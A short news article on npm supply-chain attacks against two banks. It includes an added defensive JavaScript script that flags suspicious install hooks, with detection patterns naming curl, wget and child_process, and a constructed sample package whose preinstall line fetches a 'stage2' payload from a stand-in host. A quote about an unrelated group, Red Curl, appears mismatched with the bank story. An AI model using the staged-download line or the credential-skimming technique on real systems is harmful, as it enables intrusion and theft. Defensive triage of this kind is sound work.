Banks Hacked With Open-Source Software

In the first half of 2023, cyber security researchers at Checkmarx discovered an open-source software supply chain campaign targeting the banking industry.

Two banks have been targeted by open-source software supply chain attacks in recent months in what researchers are calling the first such incidents of their kind.

“These attacks showcased advanced techniques, including targeting specific components in web assets of the victim bank by attaching malicious functionalities to it,” says Checkmarx.

"Over the past four and a half years, the Russian-speaking group Red Curl has carried out at least 34 attacks on companies from the UK, Germany, Canada, Norway, Ukraine, and Australia".

The hackers created fake social media accounts to lend apparent legitimacy to their malicious software uploads.

In the first attack, the hackers uploaded malicious npm packages to the registry and posed as a bank employee.

The attackers created fake LinkedIn profiles to get in touch with the victims’ employees and used a specific C2 for each target. The experts noticed that the contributor behind the malicious packages was linked to the LinkedIn profile page of an individual who was posing as an employee of the victim.

If the npm package was launched, the script determined the operating system type and downloaded a second-stage malware package via Azure’s CDN subdomains. The second-stage payload included the open-source command-and-control (C2) framework Havoc.
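A defender's triage of the behaviour described above, as an added example that is not from Checkmarx or the original article: it flags packages whose npm lifecycle hooks combine operating system detection with a network download. That the script ran from an install-time lifecycle hook is an assumption, and the package names, file contents and the `auditPackage`, `hookTargets` and `auditAll` helpers are constructed for illustration.

```javascript
// Added example: triage npm packages by what runs at install time.
// Heuristic indicators only; package names and sources below are constructed.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall'];
const INDICATORS = {
  osCheck: /\b(os\.(platform|type)\s*\(|process\.platform\b)/,
  download: /\b(https?\.(get|request)\s*\(|fetch\s*\(|curl\s|wget\s)/i,
  execute: /\b(child_process|execSync|execFile|spawn)\b/,
};

// Resolve "node ./setup.js" style hook commands to JS files in the package.
function hookTargets(command) {
  const names = command.match(/[\w./-]+\.(?:c|m)?js\b/g) || [];
  return names.map((n) => n.replace(/^\.\//, ''));
}

// manifest: parsed package.json; files: { relativePath: sourceText }
function auditPackage(manifest, files) {
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const command = (manifest.scripts || {})[hook];
    if (!command) continue;
    // Scan the hook command itself plus every JS file it invokes.
    const text = [command, ...hookTargets(command).map((f) => files[f] || '')].join('\n');
    const hits = Object.keys(INDICATORS).filter((k) => INDICATORS[k].test(text));
    // OS fingerprinting plus a fetch at install time is the staged-download pattern.
    let severity = 'info';
    if (hits.length) severity = 'review';
    if (hits.includes('osCheck') && hits.includes('download')) severity = 'high';
    findings.push({ package: manifest.name, hook, command, hits, severity });
  }
  return findings;
}

// Constructed sample packages (not taken from the reported campaign).
const SAMPLES = [
  { manifest: { name: 'constructed-suspicious-pkg', scripts: { preinstall: 'node ./setup.js' } },
    files: { 'setup.js': "const os = require('os'); const https = require('https');\n" +
      "https.get('https://cdn.example.invalid/stage2-' + os.platform(), () => {});" } },
  { manifest: { name: 'constructed-native-addon', scripts: { install: 'node-gyp rebuild' } },
    files: {} },
  { manifest: { name: 'constructed-plain-lib', scripts: { test: 'node test.js' } }, files: {} },
];

function auditAll(samples) {
  return samples.flatMap((s) => auditPackage(s.manifest, s.files));
}
console.log(JSON.stringify(auditAll(SAMPLES), null, 2));
```

A `high` finding is a prompt for manual review of the hook script, not a verdict; legitimate packages with install hooks, such as native add-ons, surface as `info`.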

Further attacks from the hacker have employed a similar strategy, in which a malicious npm package would lie dormant until activated.

The other attack that Checkmarx reported on recently happened in February. Here too, the threat actor, completely separate from the attacker in May, uploaded their own package containing a malicious payload to npm.

In this instance, the payload was engineered specifically for the targeted bank. It was designed to hook onto a specific login form element on the bank's website and to capture and transmit information that users entered into the form when logging into the site.

Sources: Oodaloop, The Hacker News, Checkmarx, Dark Reading, The Record, SOC Radar, Security Affairs

 
